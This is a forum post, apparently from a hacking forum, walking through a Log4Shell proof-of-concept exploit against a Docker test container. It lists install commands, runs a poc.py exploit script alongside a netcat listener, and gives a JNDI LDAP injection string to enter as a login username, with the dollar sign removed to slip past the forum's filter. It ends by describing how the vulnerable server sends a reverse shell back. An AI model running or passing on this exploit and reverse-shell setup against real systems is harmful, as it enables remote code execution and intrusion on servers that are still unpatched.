OP 03 June, 2022 - 05:13 PM
(This post was last modified: 03 June, 2022 - 05:29 PM by 0a7. Edited 2 times in total.)
![[Image: log4shell.gif]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fcdn.discordapp.com%2Fattachments%2F969537784803106827%2F982295202721054810%2Flog4shell.gif)
Install Java
yum or apt install default-jre
Install netcat
yum or apt install netcat
Install Docker
yum or apt install docker
Install pip3
yum or apt install python3-pip
Install requirements
pip3 install -r requirements.txt
Install Java-sdk
Step 1 :
Step 2 :tar -xf jdk-8u20-linux-x64.tar.gz
Step 3 : put the file in the root of log4j-shell-poc-main
Install dockerfile for test exploit
Step 1 : docker build -t log4j-shell-poc .
Step 2 : docker run --network host log4j-shell-poc
Step 3 : connect to http://127.0.0.1:8080
We can start the test
Step 1 : It will take 2 terminals, 1 to launch the exploit, the other for ncat
First Terminal : python3 poc.py --userip localhost --webport 8000 --lport 9001
Second Terminal : nc -lvnp 9001
Web part
go back to your http server (from docker)(http://127.0.0.1:8080)
Login username : {jndi:ldap://localhost:1389/a} (add the $ in front of the quotes, I couldn't put it because it's considered a sql attack and it blocks me from posting the thread)
Passwd : no matter
Well done, you are finally in your reverseshell!
Explication :
{jndi:ldap-> log4j code, log4j code -> poc.py, poc.py -> poc returns code to docker or your vulnerable site/server -> and your docker sends a reverseshell to your machine.
Spoiler:
